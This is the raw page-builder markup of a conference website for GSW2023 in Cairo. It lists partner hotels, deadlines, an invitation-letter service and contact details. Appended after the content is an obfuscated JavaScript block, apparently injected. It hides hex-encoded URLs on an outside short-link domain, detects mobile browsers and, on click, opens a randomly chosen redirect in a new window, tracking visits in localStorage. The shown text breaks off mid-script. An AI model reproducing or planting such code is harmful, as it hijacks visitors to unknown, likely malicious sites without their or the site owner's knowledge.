cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let 